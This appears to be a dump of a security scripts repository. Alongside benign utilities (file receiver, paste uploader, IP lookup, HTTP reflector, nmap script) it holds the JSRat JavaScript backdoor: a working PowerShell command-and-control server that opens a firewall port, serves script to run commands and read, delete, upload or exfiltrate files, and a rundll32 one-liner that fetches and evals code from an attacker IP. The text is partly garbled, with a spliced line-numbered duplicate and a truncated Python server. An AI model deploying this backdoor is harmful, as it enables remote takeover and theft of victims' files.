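Usage: file_server.py <listen_port> <output_file>

Review note: the server accepts exactly one connection, from any address,
with no authentication, and overwrites <output_file> with whatever the peer
sends.  Bind it only on a trusted network; the output path is chosen by the
operator, never by the peer.
"""
from __future__ import print_function

import socket
import sys

CHUNK_SIZE = 102400


def receive_file(conn, fobj):
    """Copy everything received on conn into fobj until the peer closes."""
    chunk = conn.recv(CHUNK_SIZE)
    while chunk:
        fobj.write(chunk)
        chunk = conn.recv(CHUNK_SIZE)


def main(argv):
    """Entry point; returns the process exit status."""
    if len(argv) != 3:
        print("\nUsage: file_server.py <listen_port> <output_file>")
        return 1
    srv = socket.socket()
    # Allow an immediate restart on the same port after the single transfer.
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", int(argv[1])))
    srv.listen(10)
    try:
        conn, address = srv.accept()
        print(address)
        try:
            print("[*] Writing to file")
            with open(argv[2], "wb") as fobj:
                receive_file(conn, fobj)
            print("[*] File created")
        finally:
            conn.close()
    finally:
        srv.close()
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))


# ==== file-transfer/ideone_transfer.py ====
"""Overwrite an ideone.com paste with <content> and print the paste back.

Usage:   ideone_transfer.py <ideone_id> <content>
Example: ideone_transfer.py abcdef hello

Requires the ``requests`` module and a logged-in ideone session: set
IDEONE_PHPSESSID, IDEONE_JIDEONE and IDEONE_SETTINGS in the environment
(they are session cookies, i.e. credentials -- do not paste them into the
script).  IDEONE_PROXY (e.g. http://127.0.0.1:8080) routes both requests
through a proxy for inspection.

Review notes:
- The original referenced ``proxies`` although its definition was commented
  out, so every run failed with NameError.
- ideone is a public third-party site reached over plain HTTP; anything
  transferred this way must be considered public.
"""
from __future__ import print_function

import os
import sys

IDEONE_SUBMIT_URL = "http://ideone.com/submitedit"
IDEONE_PLAIN_URL = "http://ideone.com/plain/"


def build_post_data(ideone_id, user_content):
    """Form fields for the submitedit request."""
    return {"input": "", "source": user_content, "link": ideone_id, "only_save": "false"}


def session_cookies():
    """Session cookies taken from the environment (all three are required)."""
    return {
        "PHPSESSID": os.environ.get("IDEONE_PHPSESSID", ""),
        "JIDEONE": os.environ.get("IDEONE_JIDEONE", ""),
        "settings": os.environ.get("IDEONE_SETTINGS", ""),
    }


def transfer(ideone_id, user_content):
    """Push user_content into the paste and return the paste's plain text."""
    try:
        import requests  # third-party; imported here so the helpers above work without it
    except ImportError as e:
        print("[!] Error: " + str(e))
        print("[*] Make sure you have the following Python module installed: requests")
        sys.exit(0)
    proxy = os.environ.get("IDEONE_PROXY")
    proxies = {"http": proxy, "https": proxy} if proxy else None
    cookies = session_cookies()
    post_data = build_post_data(ideone_id, user_content)
    requests.post(IDEONE_SUBMIT_URL, data=post_data, cookies=cookies,
                  proxies=proxies, verify=False, timeout=30)
    r = requests.post(IDEONE_PLAIN_URL + ideone_id, data=post_data,
                      cookies=cookies, proxies=proxies, verify=False, timeout=30)
    return r.text


def main(argv):
    """Entry point; returns the process exit status."""
    if len(argv) != 3:
        print("Usage: " + argv[0] + " <ideone_id> <content>")
        print("Example: " + argv[0] + " abcdef hello")
        return 0
    print(transfer(argv[1], argv[2]))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))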
Error: "+str(e) 6 | print "[*] Make sure you have the following Python modules installed:\n\BeautifulSoup, requests, sys" 7 | exit(0) 8 | 9 | if(len(sys.argv)!=3): 10 | print "Usage: " + sys.argv[0] + " " 11 | print "Example: " + sys.argv[0] + "abcdef hello" 12 | exit(0) 13 | 14 | #proxies = {"http": "http://127.0.0.1:9092", "https": "http://127.0.0.1:9092",} 15 | 16 | #abc123 17 | ideone_id = sys.argv[1] 18 | user_content = sys.argv[2] 19 | 20 | #Configuration (First 3 required) 21 | PHPSESSID = "" 22 | JIDEONE = "" 23 | settings = "" 24 | _ga = "" 25 | _gat = "" 26 | __unam = "" 27 | 28 | cookies = {"PHPSESSID":PHPSESSID, "JIDEONE":JIDEONE, "settings":settings} 29 | post_data = {"input":"", "source":user_content, "link":ideone_id, "only_save":"false"} 30 | r = requests.post("http://ideone.com/submitedit", data=post_data, cookies=cookies, proxies=proxies, verify=False) 31 | sc = r.text 32 | #print sc 33 | r = requests.post("http://ideone.com/plain/"+ideone_id, data=post_data, cookies=cookies, verify=False) 34 | sc2 = r.text 35 | print sc2 36 | -------------------------------------------------------------------------------- /format-usb.ps1: -------------------------------------------------------------------------------- 1 | $usbdrives = Get-WmiObject Win32_Volume -Filter "DriveType='2'"|select -expand driveletter 2 | $usbdrives = $usbdrives.Trim(":") 3 | #THIS WILL FORMAT THE DRIVE 4 | #Format-Volume -DriveLetter $usbdrives -NewFileSystemLabel MyDrive -FileSystem NTFS -Confirm:$false 5 | #notepad $usbdrives 6 | Unregister-Event -SourceIdentifier volumeChange -ErrorAction SilentlyContinue 7 | Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange -ErrorAction SilentlyContinue 8 | #write-host (get-date -format s) " Beginning script..." 
9 | do 10 | { 11 | $newEvent = Wait-Event -SourceIdentifier volumeChange 12 | $eventType = $newEvent.SourceEventArgs.NewEvent.EventType 13 | $eventTypeName = switch($eventType) 14 | { 15 | 1 {"Configuration changed"} 16 | 2 {"Device arrival"} 17 | 3 {"Device removal"} 18 | 4 {"docking"} 19 | } 20 | #write-host (get-date -format s) " Event detected = " $eventTypeName 21 | if ($eventType -eq 2) 22 | { 23 | $driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName 24 | $driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName 25 | #write-host (get-date -format s) " Drive name = " $driveLetter 26 | #write-host (get-date -format s) " Drive label = " $driveLabel 27 | $driveLetter = $driveLetter.Trim(":") 28 | #write-host $driveLetter 29 | 30 | #THIS WILL FORMAT THE DRIVE 31 | #Format-Volume -DriveLetter $driveLetter -NewFileSystemLabel MyDrive -FileSystem NTFS -Confirm:$false 32 | #calc 33 | 34 | # Execute process if drive matches specified condition(s) 35 | #if ($driveLetter -eq 'Z:' -and $driveLabel -eq 'Mirror') 36 | #{ 37 | # write-host (get-date -format s) " Starting task in 3 seconds..." 38 | # start-sleep -seconds 3 39 | # start-process "Z:\sync.bat" 40 | #} 41 | } 42 | Remove-Event -SourceIdentifier volumeChange -ErrorAction SilentlyContinue 43 | } while (1-eq1) #Loop until next event 44 | Unregister-Event -SourceIdentifier volumeChange -ErrorAction SilentlyContinue -------------------------------------------------------------------------------- /generate-ssl-cert-key.txt: -------------------------------------------------------------------------------- 1 | openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 2 | -------------------------------------------------------------------------------- /host-ip.ps1: -------------------------------------------------------------------------------- 1 | # The following line read a plain list of IPs from files. 
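For this demo, I have 2 | # this line commented out and added a line to just define an array of IPs here 3 | 4 | $listofIPs = Get-Content ip-list.txt 5 | 6 | #$listofIPs = "8.8.8.8","8.8.4.4","10.0.0.2","192.168.2.1" 7 | 8 | #Lets create a blank array for the resolved names 9 | $ResultList = @() 10 | 11 | # Lets resolve each of these addresses 12 | foreach ($ip in $listofIPs) 13 | { 14 | $result = $null 15 | 16 | $currentEAP = $ErrorActionPreference 17 | $ErrorActionPreference = "silentlycontinue" 18 | 19 | #Use the DNS Static .Net class for the reverse lookup 20 | # details on this method found here: http://msdn.microsoft.com/en-us/library/ms143997.aspx 21 | $result = [System.Net.Dns]::gethostentry($ip) 22 | 23 | $ErrorActionPreference = $currentEAP 24 | 25 | If ($Result) 26 | { 27 | $hostname = [string]$Result.AddressList.IPAddressToString #HostName 28 | $Resultlist += "$IP,$HOSTNAME" 29 | $temp = "$IP,$HOSTNAME" 30 | $temp 31 | } 32 | Else 33 | { 34 | $Resultlist += "$IP,No Hostname found" 35 | $temp = "$IP,No Hostname found" 36 | $temp 37 | } 38 | } 39 | 40 | # If we wanted to output the results to a text file we could do this, for this 41 | # demo I have this line commented and another line here to echo the results to the screen 42 | 43 | $resultlist | Out-File output.csv 44 | 45 | $ResultList 46 | --------------------------------------------------------------------------------
/http-reflect.py: --------------------------------------------------------------------------------
#!/usr/bin/python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)
# Script modified by @xploresec

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser
import sys

# Upper bound on the request body that is read and echoed.  Content-Length is
# client-controlled; without a cap a single request could make rfile.read()
# buffer an arbitrarily large body in memory.
MAX_BODY_BYTES = 1024 * 1024


class RequestHandler(BaseHTTPRequestHandler):
    """Print every request (path, headers, body) to stdout and answer 200.

    No response body is sent; the handler only shows what a client sent.
    """

    def _print_request(self, body=None):
        """Dump the request path, headers and (when given) body to stdout."""
        print("\n----- Request Start ----->\n")
        print(self.path)
        print(self.headers)
        if body is not None:
            print(body)
        print("<----- Request End -----\n")

    def _finish_response(self, extra_headers=()):
        """Send a 200 with an empty body and a properly terminated header block.

        extra_headers: iterable of (name, value) pairs added before the
        terminator.  The original never called end_headers(), so the
        header block was never closed and clients waited on an unfinished
        response.
        """
        self.send_response(200)
        for name, value in extra_headers:
            self.send_header(name, value)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        """Echo a GET (or DELETE) request; keeps the original Set-Cookie header."""
        self._print_request()
        self._finish_response([("Set-Cookie", "foo=bar")])

    def do_POST(self):
        """Echo a POST (or PUT) request including up to MAX_BODY_BYTES of body."""
        # getheader() is the Python 2 mimetools.Message API matching this
        # file's BaseHTTPServer import.
        try:
            length = int(self.headers.getheader('content-length', 0))
        except ValueError:
            length = 0
        length = max(0, min(length, MAX_BODY_BYTES))
        body = self.rfile.read(length) if length else ""
        self._print_request(body)
        self._finish_response()

    do_PUT = do_POST
    do_DELETE = do_GET


def main(args=None):
    """Bind the reflector to HOST PORT (from *args*, default sys.argv[1:]) and serve.

    Exits with status 0 and a usage line when the arguments are wrong, as
    the original did.
    """
    if args is None:
        args = sys.argv[1:]
    if len(args) != 2:
        print("Usage: " + sys.argv[0] + " HOST PORT")
        print("Example: " + sys.argv[0] + " 0.0.0.0 8080")
        sys.exit(0)
    my_ip = args[0]
    port = int(args[1])
    print('Listening on %s:%s' % (my_ip, port))
    server = HTTPServer((my_ip, port), RequestHandler)
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        # Release the listening socket instead of dying with a traceback.
        server.server_close()


if __name__ == "__main__":
    parser = OptionParser()
    parser.usage = ("Creates an http-server that will echo out any GET or POST parameters\n"
                    "Run:\n\n"
                    "  %prog HOST PORT")
    (options, args) = parser.parse_args()
    main(args)
--------------------------------------------------------------------------------
/http-status.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local nmap = require "nmap" 3 | local shortport = require "shortport" 4 | local stdnse = require "stdnse" 5 | local table = require "table" 6 | 7 | description = [[ 8 | Performs a HEAD request for the root folder ("/") of a web server and displays the HTTP headers returned and saves the IP, Port and HTTP status code in RAWR CSV format. Modified from http-headers.nse script.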
9 | ]] 10 | 11 | --- 12 | -- @output 13 | -- PORT STATE SERVICE 14 | -- 80/tcp open http 15 | -- | http-headers: 16 | -- | Date: Fri, 25 Jan 2013 17:39:08 GMT 17 | -- | Server: Apache/2.2.14 (Ubuntu) 18 | -- | Accept-Ranges: bytes 19 | -- | Vary: Accept-Encoding 20 | -- | Connection: close 21 | -- | Content-Type: text/html 22 | -- | 23 | -- |_ (Request type: HEAD) 24 | -- 25 | --@args path The path to request, such as /index.php. Default /. 26 | --@args useget Set to force GET requests instead of HEAD. 27 | 28 | author = "Ron Bowes" 29 | 30 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 31 | 32 | categories = {"discovery", "safe"} 33 | 34 | portrule = function( host, port ) 35 | return true 36 | end 37 | 38 | action = function(host, port) 39 | local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/" 40 | local useget = stdnse.get_script_args(SCRIPT_NAME..".useget") 41 | local request_type = "HEAD" 42 | local status = false 43 | local result 44 | 45 | -- Check if the user didn't want HEAD to be used 46 | if(useget == nil) then 47 | -- Try using HEAD first 48 | status, result = http.can_use_head(host, port, nil, path) 49 | end 50 | 51 | -- If head failed, try using GET 52 | if(status == false) then 53 | stdnse.debug1("HEAD request failed, falling back to GET") 54 | result = http.get(host, port, path) 55 | request_type = "GET" 56 | end 57 | 58 | if(result == nil) then 59 | if(nmap.debugging() > 0) then 60 | return "ERROR: Header request failed" 61 | else 62 | return nil 63 | end 64 | end 65 | 66 | if(result.rawheader == nil) then 67 | if(nmap.debugging() > 0) then 68 | return "ERROR: Header request didn't return a proper header" 69 | else 70 | return nil 71 | end 72 | end 73 | 74 | table.insert(result.rawheader, "(Request type: " .. request_type .. 
")") 75 | local file = io.open("http-status-code.csv", "a") 76 | file:write(host.ip..","..port.number..","..result.status..",http,http\n") 77 | file:close() 78 | local file = io.open("https-status-code.csv", "a") 79 | file:write(host.ip..","..port.number..","..result.status..",http,ssl\n") 80 | file:close() 81 | return stdnse.format_output(true, result.rawheader) 82 | end 83 | -------------------------------------------------------------------------------- /ip-host.ps1: -------------------------------------------------------------------------------- 1 | # The following line read a plain list of IPs from files. For this demo, I have 2 | # this line commented out and added a line to just define an array of IPs here 3 | 4 | $listofIPs = Get-Content IPList.txt 5 | 6 | #$listofIPs = "8.8.8.8","8.8.4.4","10.0.0.2","192.168.2.1" 7 | 8 | #Lets create a blank array for the resolved names 9 | $ResultList = @() 10 | 11 | # Lets resolve each of these addresses 12 | foreach ($ip in $listofIPs) 13 | { 14 | $result = $null 15 | 16 | $currentEAP = $ErrorActionPreference 17 | $ErrorActionPreference = "silentlycontinue" 18 | 19 | #Use the DNS Static .Net class for the reverse lookup 20 | # details on this method found here: http://msdn.microsoft.com/en-us/library/ms143997.aspx 21 | $result = [System.Net.Dns]::gethostentry($ip) 22 | 23 | $ErrorActionPreference = $currentEAP 24 | 25 | If ($Result) 26 | { 27 | $hostname = [string]$Result.HostName 28 | $Resultlist += "$IP,$HOSTNAME" 29 | $temp = "$IP,$HOSTNAME" 30 | $temp 31 | } 32 | Else 33 | { 34 | $Resultlist += "$IP,No Hostname found" 35 | $temp = "$IP,No Hostname found" 36 | $temp 37 | } 38 | } 39 | 40 | # If we wanted to output the results to a text file we could do this, for this 41 | # demo I have this line commented and another line here to echo the results to the screen 42 | 43 | $resultlist | Out-File output.csv 44 | 45 | $ResultList -------------------------------------------------------------------------------- 
/ip2country.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import requests 3 | import sys 4 | 5 | if len(sys.argv)<=1: 6 | print "Usage: "+sys.argv[0]+" " 7 | 8 | f = open(sys.argv[1],"r") 9 | data = f.readlines() 10 | for ip in data: 11 | ip = (ip.replace("\r","")).replace("\n","") 12 | try: 13 | temp = requests.get("http://ip-api.com/csv/"+ip,timeout=120) 14 | resp = temp.content 15 | d = resp.split(",") 16 | print ip+","+d[1] 17 | except: 18 | print ip+","+"Failed" 19 | -------------------------------------------------------------------------------- /javascript-backdoor/JSRat.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | --- 3 | Learn from Casey Smith @subTee 4 | Author: 3gstudent 5 | --- 6 | Javascript Backdoor 7 | --- 8 | Server: 9 | run as admin: 10 | powershell.exe -ExecutionPolicy Bypass -File c:\test\JSRat.ps1 11 | 12 | Client: 13 | cmd line: 14 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 15 | 16 | 17 | #> 18 | 19 | $Server = '192.168.174.131' #Listening IP. Change This. 
20 | 21 | function Receive-Request 22 | { 23 | param 24 | ( 25 | $Request 26 | ) 27 | $output = "" 28 | $size = $Request.ContentLength64 + 1 29 | $buffer = New-Object byte[] $size 30 | do 31 | { 32 | $count = $Request.InputStream.Read($buffer, 0, $size) 33 | $output += $Request.ContentEncoding.GetString($buffer, 0, $count) 34 | } until($count -lt $size) 35 | $Request.InputStream.Close() 36 | write-host $output 37 | } 38 | 39 | $listener = New-Object System.Net.HttpListener 40 | $listener.Prefixes.Add('http://+:80/') 41 | 42 | netsh advfirewall firewall delete rule name="PoshRat 80" | Out-Null 43 | netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80 | Out-Null 44 | 45 | $listener.Start() 46 | 'Listening ...' 47 | while ($true) 48 | { 49 | $context = $listener.GetContext() # blocks until request is received 50 | $request = $context.Request 51 | $response = $context.Response 52 | $hostip = $request.RemoteEndPoint 53 | 54 | #Use this for One-Liner Start 55 | if ($request.Url -match '/connect$' -and ($request.HttpMethod -eq "GET")) 56 | { 57 | write-host "Usage:" -fore Green 58 | write-host " cmd: just input the cmd command" -fore Green 59 | write-host " delete file: input:delete,then set the file path" -fore Green 60 | write-host " exitbackdoor: input:exit" -fore Green 61 | write-host " read file: input:read,then set the file path" -fore Green 62 | write-host " run exe: input:run,then set the file path" -fore Green 63 | write-host " download file: input:download,then set the file path" -fore Green 64 | write-host " upload file: input:upload,then set the file path" -fore Green 65 | write-host "Host Connected" -fore Cyan 66 | $message = ' 67 | while(true) 68 | { 69 | h = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 70 | h.SetTimeouts(0, 0, 0, 0); 71 | 72 | try 73 | { 74 | h.Open("GET","http://'+$Server+'/rat",false); 75 | h.Send(); 76 | c = h.ResponseText; 77 | 78 | 79 | if(c=="delete") 80 | { 81 | p=new 
ActiveXObject("WinHttp.WinHttpRequest.5.1"); 82 | p.SetTimeouts(0, 0, 0, 0); 83 | p.Open("POST","http://'+$Server+'/rat",false); 84 | p.Send("[Next Input should be the File to Delete]"); 85 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 86 | g.SetTimeouts(0, 0, 0, 0); 87 | g.Open("GET","http://'+$Server+'/rat",false); 88 | g.Send(); 89 | d = g.ResponseText; 90 | 91 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 92 | f =fso1.GetFile(d); 93 | f.Delete(); 94 | 95 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 96 | p.SetTimeouts(0, 0, 0, 0); 97 | p.Open("POST","http://'+$Server+'/rat",false); 98 | p.Send("[Delete Success]"); 99 | continue; 100 | } 101 | 102 | else if(c=="download") 103 | { 104 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 105 | p.SetTimeouts(0, 0, 0, 0); 106 | p.Open("POST","http://'+$Server+'/rat",false); 107 | p.Send("[Next Input should be the File to download]"); 108 | 109 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 110 | g.SetTimeouts(0, 0, 0, 0); 111 | g.Open("GET","http://'+$Server+'/rat",false); 112 | g.Send(); 113 | d = g.ResponseText; 114 | 115 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 116 | f=fso1.OpenTextFile(d,1); 117 | g=f.ReadAll(); 118 | f.Close(); 119 | 120 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 121 | p.SetTimeouts(0, 0, 0, 0); 122 | p.Open("POST","http://'+$Server+'/download",false); 123 | p.Send(g); 124 | continue; 125 | } 126 | 127 | else if(c=="exit") 128 | { 129 | c="(\"cmd /c taskkill /f /im rundll32.exe\",0,true)"; 130 | r = new ActiveXObject("WScript.Shell").Run(c); 131 | 132 | } 133 | 134 | else if(c=="read") 135 | { 136 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 137 | p.SetTimeouts(0, 0, 0, 0); 138 | p.Open("POST","http://'+$Server+'/rat",false); 139 | p.Send("[Next Input should be the File to Read]"); 140 | 141 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 142 | g.SetTimeouts(0, 0, 0, 0); 143 | g.Open("GET","http://'+$Server+'/rat",false); 
144 | g.Send(); 145 | d = g.ResponseText; 146 | 147 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 148 | f=fso1.OpenTextFile(d,1); 149 | g=f.ReadAll(); 150 | f.Close(); 151 | 152 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 153 | p.SetTimeouts(0, 0, 0, 0); 154 | p.Open("POST","http://'+$Server+'/rat",false); 155 | p.Send(g); 156 | continue; 157 | } 158 | 159 | 160 | else if(c=="run") 161 | { 162 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 163 | p.SetTimeouts(0, 0, 0, 0); 164 | p.Open("POST","http://'+$Server+'/rat",false); 165 | p.Send("[Next Input should be the File to Run]"); 166 | 167 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 168 | g.SetTimeouts(0, 0, 0, 0); 169 | g.Open("GET","http://'+$Server+'/rat",false); 170 | g.Send(); 171 | d = g.ResponseText; 172 | 173 | r = new ActiveXObject("WScript.Shell").Run(d,0,true); 174 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 175 | p.SetTimeouts(0, 0, 0, 0); 176 | p.Open("POST","http://'+$Server+'/rat",false); 177 | p.Send("[Run Success]"); 178 | 179 | continue; 180 | } 181 | 182 | 183 | else if(c=="upload") 184 | { 185 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 186 | p.SetTimeouts(0, 0, 0, 0); 187 | p.Open("POST","http://'+$Server+'/rat",false); 188 | p.Send("[Start to Upload]"); 189 | 190 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 191 | g.SetTimeouts(0, 0, 0, 0); 192 | g.Open("GET","http://'+$Server+'/uploadpath",false); 193 | g.Send(); 194 | dpath = g.ResponseText; 195 | 196 | g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 197 | g2.SetTimeouts(0, 0, 0, 0); 198 | g2.Open("GET","http://'+$Server+'/uploaddata",false); 199 | g2.Send(); 200 | ddata = g2.ResponseText; 201 | 202 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 203 | f=fso1.CreateTextFile(dpath,true); 204 | f.WriteLine(ddata); 205 | f.Close(); 206 | 207 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 208 | p.SetTimeouts(0, 0, 0, 0); 209 | 
p.Open("POST","http://'+$Server+'/rat",false); 210 | p.Send("[Upload Success]"); 211 | continue; 212 | } 213 | 214 | else 215 | { 216 | 217 | r = new ActiveXObject("WScript.Shell").Exec(c); 218 | var so; 219 | while(!r.StdOut.AtEndOfStream){so=r.StdOut.ReadAll()} 220 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 221 | p.Open("POST","http://'+$Server+'/rat",false); 222 | p.Send(so); 223 | } 224 | 225 | } 226 | catch(e1) 227 | { 228 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 229 | p.SetTimeouts(0, 0, 0, 0); 230 | p.Open("POST","http://'+$Server+'/rat",false); 231 | p.Send("[No Output]"); 232 | 233 | } 234 | 235 | } 236 | ' 237 | 238 | } 239 | 240 | if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "POST") ) 241 | { 242 | Receive-Request($request) 243 | } 244 | 245 | if ($request.Url -match '/download$' -and ($request.HttpMethod -eq "POST") ) 246 | { 247 | $output = "" 248 | $size = $Request.ContentLength64 + 1 249 | $buffer = New-Object byte[] $size 250 | do { 251 | $count = $Request.InputStream.Read($buffer, 0, $size) 252 | $output += $Request.ContentEncoding.GetString($buffer, 0, $count) 253 | } until($count -lt $size) 254 | $Request.InputStream.Close() 255 | 256 | write-host "Input the Path to Save:" -fore Red 257 | $message = Read-Host 258 | Set-Content $message -Value $output 259 | write-host "Save Success" -fore Red 260 | } 261 | 262 | if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "GET")) 263 | { 264 | $response.ContentType = 'text/plain' 265 | $message = Read-Host "JS $hostip>" 266 | } 267 | 268 | if($BoolExit -eq 1) 269 | { 270 | exit 271 | } 272 | $BoolExit=0 273 | 274 | if($message -eq "exit") 275 | { 276 | $BoolExit=1 277 | } 278 | 279 | 280 | 281 | if ($request.Url -match '/uploadpath$' -and ($request.HttpMethod -eq "GET") ) 282 | { 283 | write-host "Input the Path to upload:" -fore Red 284 | $UploadPath = Read-Host 285 | write-host "Input the Destination Path:" -fore Red 286 | $message = Read-Host 287 | } 288 
| 289 | 290 | if ($request.Url -match '/uploaddata$' -and ($request.HttpMethod -eq "GET") ) 291 | { 292 | $message = Get-Content $UploadPath 293 | } 294 | 295 | [byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message) 296 | $response.ContentLength64 = $buffer.length 297 | $output = $response.OutputStream 298 | $output.Write($buffer, 0, $buffer.length) 299 | $output.Close() 300 | 301 | } 302 | 303 | $listener.Stop() 304 | -------------------------------------------------------------------------------- /javascript-backdoor/README.md: -------------------------------------------------------------------------------- 1 | #Javascript Backdoor 2 | 3 | http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html 4 | 5 | ##Victim machine 6 | 7 | ```rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}``` 8 | 9 | ##Attacker machine 10 | 11 | ```powershell.exe -ExecutionPolicy Bypass -File JSRat.ps1``` 12 | 13 | ##Important 14 | 15 | Update the IP address in JSRat.ps1 (line 19) and the command to be executed on victim machine. 
16 | 17 | ##Python implementation 18 | 19 | https://github.com/Hood3dRob1n/JSRat-Py 20 | -------------------------------------------------------------------------------- /javascript-backdoor/py-jsrat.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/javascript-backdoor/py-jsrat.zip -------------------------------------------------------------------------------- /javascript-backdoor/py-jsrat/JSRat.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # JSRat Server - Python Implementation 4 | # By: Hood3dRob1n 5 | # 6 | """ 7 | Simple JS Reverse Shell over HTTP for Windows 8 | We run web server and then execute commands against the connecting Client/Victim 9 | 10 | Command to Launch JS Reverse Shell from Client||Victim Windows box: 11 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://10.10.10.10:31337/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 12 | 13 | $(JSRat)> cmd /c dir C:\ 14 | 15 | References & Original Project: 16 | http://en.wooyun.io/2016/02/04/42.html 17 | http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html 18 | https://gist.github.com/subTee/f1603fa5c15d5f8825c0 19 | 20 | """ 21 | 22 | import optparse, os, socket, SocketServer, sys 23 | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer 24 | from classes.colors import * 25 | import requests # Used for --find-ip option, otherwise not needed 26 | 27 | try: 28 | import readline 29 | except: 30 | error("No Python Readline"); 31 | pad(); bad("No history support as a result, sorry..."); 32 | 33 | 34 | def banner(): 35 | cls(); 36 | print red("\nJSRat Server") + white(" - ") 
+ blue("Python ") + yellow("Implementation"); 37 | print blue("By") + white(": Hood3dRob1n"); 38 | 39 | 40 | def cls(): 41 | if os.name == 'nt' or sys.platform.startswith('win'): 42 | os.system('cls'); 43 | else: 44 | os.system('clear'); 45 | 46 | 47 | def internal_ip(): 48 | 'Check Internal IP' # Google IP address used... 49 | try: 50 | iip = [(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1] 51 | except: 52 | error("Problem resolving internal IP!") 53 | return "Problem resolving internal IP!" 54 | return iip 55 | 56 | 57 | def external_ip(): 58 | 'Check External IP using checkip.dyndns.org' 59 | url = 'http://checkip.dyndns.org/' # Simple External IP Check using dyndns... 60 | try: 61 | headers = { 'User-agent' : 'Python External IP Checker v0.01b' } 62 | res = requests.get( url, headers=headers, timeout=30.0 ) 63 | body = str( res.text ) 64 | extip = re.search('\d+\.\d+\.\d+\.\d+', body) 65 | except: 66 | error("Problem resolving extrernal IP!") 67 | return "Problem resolving extrernal IP!" 68 | return extip.group() 69 | 70 | 71 | def jsrat(): 72 | """ 73 | Build & Return the core JS code to operate JSRat on victim 74 | Essentially serve up additional JS to be evaluated by client based on need 75 | NOTE: Client must be using IE browser, or all bets are off - but you should know this already... 
